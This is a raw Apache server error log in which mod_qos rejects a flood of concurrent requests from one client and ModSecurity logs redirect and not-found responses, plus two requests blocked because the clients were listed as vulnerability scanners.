[Tue May 26 19:59:20.902105 2026] [qos:error] [pid 93868:tid 94258] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254pQAAAY8
[Tue May 26 19:59:20.902776 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQEqK9k_ZUB2Vp254pgAAAfs
[Tue May 26 19:59:21.031967 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuRQAAAE8
[Tue May 26 19:59:21.033136 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuRgAAAEk
[Tue May 26 19:59:21.035657 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuRwAAAGU
[Tue May 26 19:59:21.042235 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254qgAAAeM
[Tue May 26 19:59:21.045780 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254qwAAAgM
[Tue May 26 19:59:21.045786 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuSAAAABY
[Tue May 26 19:59:21.048529 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254rAAAAe4
[Tue May 26 19:59:21.053863 2026] [qos:error] [pid 93868:tid 94319] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254rQAAAcw
[Tue May 26 19:59:21.057169 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254rgAAAgA
[Tue May 26 19:59:21.057983 2026] [qos:error] [pid 93868:tid 94334] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254rwAAAds
[Tue May 26 19:59:21.182319 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuUAAAAEk
[Tue May 26 19:59:21.184445 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuUQAAAGU
[Tue May 26 19:59:21.188368 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuUgAAABY
[Tue May 26 19:59:21.191665 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254sQAAAf4
[Tue May 26 19:59:21.200658 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254sgAAAdQ
[Tue May 26 19:59:21.200812 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuUwAAAAA
[Tue May 26 19:59:21.203206 2026] [qos:error] [pid 93868:tid 94345] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254swAAAeY
[Tue May 26 19:59:21.205704 2026] [qos:error] [pid 93868:tid 94318] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254tAAAAcs
[Tue May 26 19:59:21.211614 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254tQAAAbY
[Tue May 26 19:59:21.218503 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp254tgAAAbA
[Tue May 26 19:59:21.275685 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP2DRMqfxdEDkosztwQAAABc"]
[Tue May 26 19:59:21.275960 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2537AAAAfc"]
[Tue May 26 19:59:21.280974 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2536gAAAec"]
[Tue May 26 19:59:21.282237 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztfQAAAE4"]
[Tue May 26 19:59:21.294548 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP2DRMqfxdEDkosztvgAAAAY"]
[Tue May 26 19:59:21.313138 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2539AAAAck"]
[Tue May 26 19:59:21.314711 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2539gAAAcU"]
[Tue May 26 19:59:21.316406 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254OgAAAbs"]
[Tue May 26 19:59:21.317316 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254OwAAAdE"]
[Tue May 26 19:59:21.331526 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254PAAAAas"]
[Tue May 26 19:59:21.347076 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp2537wAAAco"]
[Tue May 26 19:59:21.348498 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254PwAAAao"]
[Tue May 26 19:59:21.372786 2026] [security2:error] [pid 93576:tid 93599] [remote 74.7.241.58:57700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWuQWDRMqfxdEDkoszuVgAAHBQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/elementor/modules/system-info
[Tue May 26 19:59:21.402902 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254QgAAAbw"]
[Tue May 26 19:59:21.411825 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254PgAAAZs"]
[Tue May 26 19:59:21.413265 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254QwAAAfY"]
[Tue May 26 19:59:21.416939 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP2DRMqfxdEDkosztygAAAEY"]
[Tue May 26 19:59:21.436090 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254RQAAAaU"]
[Tue May 26 19:59:21.440892 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszt0AAAAG0"]
[Tue May 26 19:59:21.454261 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254VwAAAd8"]
[Tue May 26 19:59:21.458810 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254RAAAAbk"]
[Tue May 26 19:59:21.498938 2026] [http2:info] [pid 106517:tid 106517] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:59:21.502974 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuQUqK9k_ZUB2Vp2545wAAAeE
[Tue May 26 19:59:21.505817 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp2546AAAAfs
[Tue May 26 19:59:21.521284 2026] [security2:error] [pid 93868:tid 94341] [client 66.249.74.163:53017] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.yndglobal.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254dgAAAeI"]
[Tue May 26 19:59:21.563136 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszudwAAAG0
[Tue May 26 19:59:21.567894 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszueAAAAAA
[Tue May 26 19:59:21.573350 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszuegAAAF4
[Tue May 26 19:59:21.578502 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp2547QAAAfY
[Tue May 26 19:59:21.588605 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszufAAAAHE
[Tue May 26 19:59:21.596501 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQWDRMqfxdEDkoszufQAAACQ
[Tue May 26 19:59:21.609460 2026] [qos:error] [pid 93868:tid 94348] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp2547gAAAek
[Tue May 26 19:59:21.615105 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuQUqK9k_ZUB2Vp2548AAAAfQ
[Tue May 26 19:59:21.835749 2026] [security2:error] [pid 93868:tid 94310] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp254uQAAAcM"]
[Tue May 26 19:59:22.285273 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP2DRMqfxdEDkosztxAAAAGA"]
[Tue May 26 19:59:22.285440 2026] [security2:error] [pid 93576:tid 93736] [client 45.92.1.17:58229] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszsqAAAABg"], referer: www.google.com
[Tue May 26 19:59:22.293129 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254WgAAAaI"]
[Tue May 26 19:59:22.320326 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254SAAAAdI"]
[Tue May 26 19:59:22.343166 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254bwAAAZI"]
[Tue May 26 19:59:22.343202 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuP2DRMqfxdEDkosztyQAAADU"]
[Tue May 26 19:59:22.368091 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254fgAAAaQ"]
[Tue May 26 19:59:22.393849 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254VQAAAgo"]
[Tue May 26 19:59:22.396156 2026] [security2:error] [pid 93868:tid 94365] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254agAAAfo"]
[Tue May 26 19:59:22.396516 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254bQAAAfk"]
[Tue May 26 19:59:22.397832 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254ZQAAAag"]
[Tue May 26 19:59:22.403668 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszt9gAAADc"]
[Tue May 26 19:59:22.403793 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254WQAAAfM"]
[Tue May 26 19:59:22.406405 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254YgAAAdA"]
[Tue May 26 19:59:22.413481 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254fwAAAcY"]
[Tue May 26 19:59:22.420838 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254gwAAAb4"]
[Tue May 26 19:59:22.430250 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszt-QAAAF8"]
[Tue May 26 19:59:22.432722 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254hwAAAgQ"]
[Tue May 26 19:59:22.456930 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQEqK9k_ZUB2Vp254iAAAAg0"]
[Tue May 26 19:59:22.905849 2026] [security2:error] [pid 93576:tid 93760] [client 45.92.1.17:58231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuQmDRMqfxdEDkoszukwAAADA"]
[Tue May 26 19:59:23.274843 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuEQAAAFA"]
[Tue May 26 19:59:23.275616 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuDwAAAAw"]
[Tue May 26 19:59:23.291608 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszt_gAAAAM"]
[Tue May 26 19:59:23.294167 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuHAAAAGs"]
[Tue May 26 19:59:23.298011 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuFAAAAG8"]
[Tue May 26 19:59:23.300514 2026] [security2:error] [pid 93576:tid 93759] [client 45.92.1.17:58759] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "veganfoodindia.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkosztIQAAAC8"], referer: www.google.com
[Tue May 26 19:59:23.305828 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQWDRMqfxdEDkoszuYgAAABo"]
